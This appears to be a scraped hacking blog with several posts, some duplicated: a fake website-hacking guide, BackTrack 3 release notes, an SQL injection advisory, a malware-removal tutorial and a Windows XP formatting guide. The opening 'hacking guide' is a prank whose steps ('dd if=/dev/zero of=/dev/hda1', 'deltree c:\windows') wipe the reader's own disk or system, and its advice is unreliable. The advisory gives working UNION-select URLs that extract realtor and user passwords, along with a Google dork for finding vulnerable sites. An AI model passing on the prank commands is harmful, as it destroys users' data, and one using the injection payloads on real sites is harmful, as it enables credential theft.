With a proper understanding of the relevant programming languages such as C, C++, Pearl, java etc. one can be fully equipped with the technique of hacking into website. There backdoors for the web hackers for website hacking. For hacking web sites one of the best ways for the hacker is to install linux on his or her personal computer he or she wants to hack from. Then he can open up a shell to type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he will type: dd hf= (url). There are a few other alternatives for hacking sites as well. The web hackers using Windows pc can also master the art of hacking websites with the flicking of his finger.
The first step is to clean up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Cleaning up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure. Click Start then Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be cleaned by pressing Start, then Run and then cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Then after this cleaning up the hackers should type: ping -l4000 (url).
The first step is to clean up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Cleaning up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure. Click Start then Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be cleaned by pressing Start, then Run and then cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Then after this cleaning up the hackers should type: ping -l4000 (url).
BackTrack 3 - Final Release
Labels:
Linux
Max Moser to BugTraq:
BackTrack 3 Final - Release Information
Released yesterday exclusively on pauldotcom.com
Muts, Martin and I have slaved for weeks and months, together with the help of many remote-exploit’ers to bring you this fine release. As usual, this version overshadows the previous ones with extra cool things.
SAINT
SAINT has provided BackTrack users with a functional version of SAINT, pending a free request for an IP range license through the SAINT website, valid for 1 year.
Maltego
The guys over at Paterva have created a special version of Maltego v2.0 with a community license especially for BackTrack users. We would like to thank Paterva for co-operating with us and allowing us to feature this amazing tool in BackTrack.
Nessus
Tenable would not allow for redistribution of Nessus on BackTrack 3.
Kernel
2.6.21.5. Yes, yes, stop whining….We had serious deliberations concerning the BT3 kernel. We decided not to upgrade to a newer kernel as wireless injection patches were not fully tested and verified. We did not want to jeopardize the awesome wireless capabilities of BT3 for the sake of sexiness or slightly increased hardware compatibilities. All relevant security patches have been applied.
Tools
As usual, updated, sharpened, SVN’ed and armed to the teeth. This release we have some special features such as spoonwep, fastrack and other cool additions.
Availability
For the first time we distribute three different version of Backtrack 3
- CD version
- USB version
- VMWare version
BackTrack 3 final download page is here:
http://remote-exploit.org/backtrack_download.html
Final Requests
We request the community to not mirror or torrent this release, or otherwise distribute it online without our knowledge.
We are trying to gather statistics about bt3 downloads. If you would like to mirror BT3 then please:
1) Think again! Traffic generated by BT3 downloads is CRAZY.
2) Please contact us before doing so.
3) Send us monthly statistics of downloads for the iso.
If you would like to add a link to BackTrack downloads to your website, please use:
http://www.remote-exploit.org/backtrack_download.html as the download link.
Rants
Problems, fixes, bugs, opinions - should all end up in our Remote Exploit community forums, and our wiki:
Relative Real Estate Systems - Sql Injection Vulnerability
Labels:
Vurnerable
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Relative Real Estate Systems
version : <= 3.0 Vendor : http://www.dboorn.com/estate/ Description : Elegant real estate script that allows for unlimited listings and agents with featured listings, unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows, Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. request form, full admin panel.Requires PHP/Mysql Windows Server or any Web server with php support. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~ Input passed to the "listing_id" parameter in index.php is not properly verified before being used in an sql query. This can be exploited thru the browser to manipulate SQL queries and pull the username and password from realtors and users in plain text. Successful exploitation requires that "magic_quotes" is off. Poc/Exploit: ~~~~~~~~~~
Solution:
~~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
Timeline:
~~~~~~~~~
- 24 - 06 - 2008 bug found
- 24 - 06 - 2008 vendor contacted
- 24 - 06 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha - my little warrior
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Relative Real Estate Systems
version : <= 3.0 Vendor : http://www.dboorn.com/estate/ Description : Elegant real estate script that allows for unlimited listings and agents with featured listings, unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows, Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. request form, full admin panel.Requires PHP/Mysql Windows Server or any Web server with php support. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~ Input passed to the "listing_id" parameter in index.php is not properly verified before being used in an sql query. This can be exploited thru the browser to manipulate SQL queries and pull the username and password from realtors and users in plain text. Successful exploitation requires that "magic_quotes" is off. Poc/Exploit: ~~~~~~~~~~
http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat
(id,0x3a,username,0x3a,password,0x3a,email),0,1,2,3,4,5,6,7,8,9,0,1%20from%20realtors--
http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat
(username,0x3a,password),0,1,2,3,4,5,6,7,8,9,0,1%20from%20users--
Admin Login at http://[URL]/[PATH]/Admin/login_index.php
Dork:
~~~~~
Google : "index.php?go=listings&listing"
Solution:
~~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
Timeline:
~~~~~~~~~
- 24 - 06 - 2008 bug found
- 24 - 06 - 2008 vendor contacted
- 24 - 06 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha - my little warrior
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
How to remove a Trojan, Virus, or other Malware
Labels:
Tutorial
Table of Contents
1.
Diallers, Trojans, Viruses, Worms Oh My!
2.
How these infections start
3.
How to remove these infections
4.
How to protect yourself in the future
5.
Conclusion
Dialers, Trojans, Viruses, and Worms Oh My!
If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different types of infections that are categorized in the general category of Malware.
Malware - Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware.
This article will focus on those malware that are considered viruses, trojans, worms, and viruses, though this information can be used to remove the other types of malware as well. We will not go into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed and these won't be covered under this tutorial.
Before we continue it is important to understand the generic malware terms that you will be reading about.
Adware - A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware. There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.
Backdoor - A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.
Dialler - A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.
Hijackers - A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker's own start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.
Spyware - A program that monitors your activity or information on your computer and sends that information to a remote computer without your knowledge.
Trojan - A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.
Virus - A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.
Worm - A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.
How these infections start
Just like any program, in order for the program to work, it must be started. Malware programs are no different in this respect and must be started in some fashion in order to do what they were designed to do. For the most part these infections run by creating a configuration entry in the Windows Registry in order to make these programs start when your computer starts.
Unfortunately, though, in the Windows operating system there are many different ways to make a program start which can make it difficult for the average computer user to find manually. Luckily for us, though, there are programs that allow us to cut through this confusion and see the various programs that are automatically starting when windows boots. The program we recommend for this, because its free and detailed, is Autoruns from Sysinternals.
When you run this program it will list all the various programs that start when your computer is booted into Windows. For the most part, the majority of these programs are safe and should be left alone unless you know what you are doing or know you do not need them to run at startup.
At this point, you should download Autoruns and try it out. Just run the Autoruns.exe and look at all the programs that start automatically. Don't uncheck or delete anything at this point. Just examine the information to see an overview of the amount of programs that are starting automatically. When you feel comfortable with what you are seeing, move on to the next section.
How to remove these infections
We have finally arrived at the section you came here for. You are most likely reading this tutorial because you are infected with some sort of malware and want to remove it. With this knowledge that you are infected, it is also assumed that you examined the programs running on your computer and found one that does not look right. You did further research by checking that program against our Startup Database or by searching in Google and have learned that it is an infection and you now want to remove it.
If you have identified the particular program that is part of the malware, and you want to remove it, please follow these steps.
1.
Download and extract the Autoruns program by Sysinternals to C:\Autoruns
2. Reboot into Safe Mode so that the malware is not started when you are doing these steps. Many malware monitor the keys that allow them to start and if they notice they have been removed, will automatically replace that startup key. For this reason booting into safe mode allows us to get past that defense in most cases.
3. Navigate to the C:\Autoruns folder you created in Step 1 and double-click on autoruns.exe.
4. When the program starts, click on the Options menu and enable the following options by clicking on them. This will place a checkmark next to each of these options.
1. Include empty locations
2. Verify Code Signatures
3. Hide Signed Microsoft Entries
5. Then press the F5 key on your keyboard to refresh the startups list using these new settings.
6. The program shows information about your startup entries in 8 different tabs. For the most part, the filename you are looking for will be found under the Logon or the Services tabs, but you should check all the other tabs to make sure they are not loading elsewhere as well. Click on each tab and look through the list for the filename that you want to remove. The filename will be found under the Image Path column. There may be more than one entry associated with the same file as it is common for malware to create multiple startup entries. It is important to note that many malware programs disguise themselves by using the same filenames as valid Microsoft files. it is therefore important to know exactly which file, and the folder they are in, that you want to remove. You can check our Startup Database for that information or ask for help in our computer help forums.
7. Once you find the entry that is associated with the malware, you want to delete that entry so it will not start again on the next reboot. To do that right click on the entry and select delete. This startup entry will now be removed from the Registry.
8. Now that we made it so it will not start on boot up, you should delete the file using My Computer or Windows Explorer. If you can not see the file, it may be hidden. To allow you to see hidden files you can follow the steps for your operating system found in this tutorial:
How to see hidden files in Windows
9. When you are finished removing the malware entries from the Registry and deleting the files, reboot into normal mode as you will now be clean from the infection.
How to protect yourself in the future
In order to protect yourself from this happening again it is important that take proper care and precautions when using your computer. Make sure you have updated antivirus and spyware removal software running, all the latest updates to your operating system, a firewall, and only open attachments or click on popups that you know are safe. These precautions can be a tutorial unto itself, and luckily, we have one created already:
Simple and easy ways to keep your computer safe and secure on the Internet
Please read this tutorial and follow the steps listed in order to be safe on the Internet. Other tutorials that are important to read in order to protect your computer are listed below.
Understanding Spyware, Browser Hijackers, and Dialers
Understanding and Using Firewalls
Safely Connecting a Computer to the Internet
Using Spybot - Search & Destroy to remove Spyware from Your Computer
Using Ad-Aware SE to remove Spyware & Hijackers from Your Computer
Using SpywareBlaster to protect your computer from Spyware, Hijackers, and Malware
Using IE-Spyad to enhance your privacy and Security
1.
Diallers, Trojans, Viruses, Worms Oh My!
2.
How these infections start
3.
How to remove these infections
4.
How to protect yourself in the future
5.
Conclusion
Dialers, Trojans, Viruses, and Worms Oh My!
If you use a computer, read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on your computer. What many people do not know is that there are many different types of infections that are categorized in the general category of Malware.
Malware - Malware is programming or files that are developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware.
This article will focus on those malware that are considered viruses, trojans, worms, and viruses, though this information can be used to remove the other types of malware as well. We will not go into specific details about any one particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed and these won't be covered under this tutorial.
Before we continue it is important to understand the generic malware terms that you will be reading about.
Adware - A program that generates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware. There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information is provided up front then they are generally not considered malware.
Backdoor - A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.
Dialler - A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are with the intent of gaining access to pornographic material.
Hijackers - A program that attempts to hijack certain Internet functions like redirecting your start page to the hijacker's own start page, redirecting search queries to a undesired search engine, or replace search results from popular search engines with their own information.
Spyware - A program that monitors your activity or information on your computer and sends that information to a remote computer without your knowledge.
Trojan - A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system.
Virus - A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have many effects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virus has incorrectly become a general term that encompasses trojans, worms, and viruses.
Worm - A program that when run, has the ability to spread to other computers on its own using either mass-mailing techniques to email addresses found on your computer or by using the Internet to infect a remote computer using known security holes.
How these infections start
Just like any program, in order for the program to work, it must be started. Malware programs are no different in this respect and must be started in some fashion in order to do what they were designed to do. For the most part these infections run by creating a configuration entry in the Windows Registry in order to make these programs start when your computer starts.
Unfortunately, though, in the Windows operating system there are many different ways to make a program start which can make it difficult for the average computer user to find manually. Luckily for us, though, there are programs that allow us to cut through this confusion and see the various programs that are automatically starting when windows boots. The program we recommend for this, because its free and detailed, is Autoruns from Sysinternals.
When you run this program it will list all the various programs that start when your computer is booted into Windows. For the most part, the majority of these programs are safe and should be left alone unless you know what you are doing or know you do not need them to run at startup.
At this point, you should download Autoruns and try it out. Just run the Autoruns.exe and look at all the programs that start automatically. Don't uncheck or delete anything at this point. Just examine the information to see an overview of the amount of programs that are starting automatically. When you feel comfortable with what you are seeing, move on to the next section.
How to remove these infections
We have finally arrived at the section you came here for. You are most likely reading this tutorial because you are infected with some sort of malware and want to remove it. With this knowledge that you are infected, it is also assumed that you examined the programs running on your computer and found one that does not look right. You did further research by checking that program against our Startup Database or by searching in Google and have learned that it is an infection and you now want to remove it.
If you have identified the particular program that is part of the malware, and you want to remove it, please follow these steps.
1.
Download and extract the Autoruns program by Sysinternals to C:\Autoruns
2. Reboot into Safe Mode so that the malware is not started when you are doing these steps. Many malware monitor the keys that allow them to start and if they notice they have been removed, will automatically replace that startup key. For this reason booting into safe mode allows us to get past that defense in most cases.
3. Navigate to the C:\Autoruns folder you created in Step 1 and double-click on autoruns.exe.
4. When the program starts, click on the Options menu and enable the following options by clicking on them. This will place a checkmark next to each of these options.
1. Include empty locations
2. Verify Code Signatures
3. Hide Signed Microsoft Entries
5. Then press the F5 key on your keyboard to refresh the startups list using these new settings.
6. The program shows information about your startup entries in 8 different tabs. For the most part, the filename you are looking for will be found under the Logon or the Services tabs, but you should check all the other tabs to make sure they are not loading elsewhere as well. Click on each tab and look through the list for the filename that you want to remove. The filename will be found under the Image Path column. There may be more than one entry associated with the same file as it is common for malware to create multiple startup entries. It is important to note that many malware programs disguise themselves by using the same filenames as valid Microsoft files. it is therefore important to know exactly which file, and the folder they are in, that you want to remove. You can check our Startup Database for that information or ask for help in our computer help forums.
7. Once you find the entry that is associated with the malware, you want to delete that entry so it will not start again on the next reboot. To do that right click on the entry and select delete. This startup entry will now be removed from the Registry.
8. Now that we made it so it will not start on boot up, you should delete the file using My Computer or Windows Explorer. If you can not see the file, it may be hidden. To allow you to see hidden files you can follow the steps for your operating system found in this tutorial:
How to see hidden files in Windows
9. When you are finished removing the malware entries from the Registry and deleting the files, reboot into normal mode as you will now be clean from the infection.
How to protect yourself in the future
In order to protect yourself from this happening again it is important that take proper care and precautions when using your computer. Make sure you have updated antivirus and spyware removal software running, all the latest updates to your operating system, a firewall, and only open attachments or click on popups that you know are safe. These precautions can be a tutorial unto itself, and luckily, we have one created already:
Simple and easy ways to keep your computer safe and secure on the Internet
Please read this tutorial and follow the steps listed in order to be safe on the Internet. Other tutorials that are important to read in order to protect your computer are listed below.
Understanding Spyware, Browser Hijackers, and Dialers
Understanding and Using Firewalls
Safely Connecting a Computer to the Internet
Using Spybot - Search & Destroy to remove Spyware from Your Computer
Using Ad-Aware SE to remove Spyware & Hijackers from Your Computer
Using SpywareBlaster to protect your computer from Spyware, Hijackers, and Malware
Using IE-Spyad to enhance your privacy and Security
Format a Hard Drive With Windows XP
Labels:
Windows
If you want to format a hard drive while using or installing Windows XP, you've come to the right place. This can be very useful for clearing everything off a secondary drive or when installing a fresh copy of Windows. Formatting a computer hard drive is simple and can help eliminate viruses, storage issues and other hard-to-resolve problems.
Preparation
Step1
When you format a computer hard drive you will lose everything that is on the drive. Therefore, it is very important to back up anything you might want later. Additionally, if you are going to be formatting and installing XP you need to make sure you have the discs for any applications or third party hardware you use since you will need to re-install your programs and drivers after re-installing Windows. Step2
Take a moment to think of anything that you have on the computer that you wouldn't want to lose. Generally, you probably want everything in your My Documents folder, and you also want to save things like your favorites or bookmarks from your Web browser. Remember that each user on the computer has his or her own My Documents folder, Desktop items and Favorites/Bookmarks. Step3
Save everything to a CD, DVD or a hard drive that you won't be formatting. Formatting a Secondary Hard Drive
Step1
Right-Click on the “My Computer” icon either on your desktop or in the Start Menu and select “Manage.”Step2
A new window titled “Computer Management” comes up. Select “Storage” from the left hand side by clicking it once, then select “Disk Management(local)” from the right side by double-clicking it. Step3
Now in the lower part of the main frame (right side) of the window you should see a nice visual of all your hard drives. Each line is a different drive. Each box on a line (with a colored bar at the top and a size displayed in MB or GB) is a partition on the drive. Partitions are separations of space on a drive. Unless you are doing something specific that requires multiple partitions, you only want one partition per drive.Step4
First you must delete any existing partitions on the drive you are going to format. Do this by right-clicking on the partition's box and selecting “Delete Partition...” Since you already know that you will be deleting everything on the drive, and have already backed everything up, you can safely say yes to any warning the computer presents you with.Step5
If there are multiple partitions make sure you have saved everything off them since they x might each have different drive letters (i.e. “D:” or “F:”). Then repeat the above step for each of them. If you only want to format one partition that is OK and you can continue to the next step without deleting the other partitions.Step6
The box for the drive to be formatted should now have a black bar at the top of it and should say “Unallocated” under its size (see picture). Right click on it and select “New Partition...” The New Partition Wizard comes up.Step7
In the New Partition Wizard click next. On the next page make sure “Primary Partition” is selected and click next. Now make the size equal to the maximum (it should already be set to it), and click next again. On the next page the computer will automatically choose the first available drive letter for the new drive. However, if you like you can choose another drive letter from the drop-down menu, and then click next.Step8
Finally the New Partition Wizard asks if you would like to format the new partition and if so what format. Choose “NTFS” as it is faster and more secure. Leave the “Allocation unit size” as “Default.” In the “Volume label” field enter whatever name you want the drive to have. Simple is better. Avoid using spaces. Lastly, if the drive is brand new and has never been used before check the “Perform a quick format” box. If the drive has been used before leave this box unchecked. Leave the “Enable file and folder compression” box unchecked and click next. Then on the next page click finish.Step9
The wizard will now spend a little while formatting the drive. On old or large drives this may take a while. Do not close the “Computer Management” window until it finishes. You will know it is done when the word under the size of the drive changes from “Formatting” to “Healthy” and the name and drive letter you chose for the new drive show up. After it is finished you can proceed to use your newly formatted drive. Formatting and Installing from the Windows XP CD
Step1
This section explains how to reformat a drive from the Windows XP installation CD. This can be used when installing a fresh copy of Windows onto a computer. Here it is especially important to backup all of your important information because upon formatting you will lose EVERYTHING that used to be on the drive. This includes all applications and device drivers, so you must back up everything you can.Step2
Insert your Windows XP installation disc into your CD drive (Home or Pro--it does not matter).Step3
Now as you computer boots a little more it will say “Press any key to boot from CD..” press a key to do so.Step4
The CD will load up a blue screen and then spend a while loading files it needs. When it is finished it will list a few options, mainly “Press ENTER to set up Windows XP.” Press Enter or Return.Step5
Now you will be at a screen to select where to install Windows to. This is where you can delete old partitions and format drives. The box in the bottom half of the screen shows all your drives and the partitions that exist on them. Use the Up and Down arrow keys to highlight your “C:” partition and press the 'D' key (if all that shows up is “Unpartitioned space” and you have no C: or D: partitions, skip this step). On the next screen press the 'L' key to finalize deleting the partition.Step6
Now you are back on the screen to choose where to install Windows. The box on the lower half of the screen should no longer show a partition but simply have an entry “Unpartitioned space xxxxxMB.” Select this with the arrow keys and press the 'C' key to create a partition on the drive. The next screen tells you the minimum and maximum sizes the partition can be and lets you pick the size. The default size is the maximum, but double check that the number entered is the maximum and hit enter.Step7
Now you will again be back at the choose where to install Windows screen. But this time you will have a partition that looks something like this “C: Partition1 [New (Raw)]xxxxxxMB.” Highlight this entry and press enter.Step8
The next screen lets you choose which file system to format the drive with. Choose NTFS as it is faster and more secure. If the drive is brand new and has never been used before then use one of the options that ends in “(Quick).” Or, choose one of the lower down options. Use the arrow keys to select the proper one and press Enter or Return.Step9
From here you are all set and the installation of Windows will proceed starting with a format of your drive. This will take a while (over half an hour) so you can take a little break.
Subscribe to:
Posts (Atom)
Posts
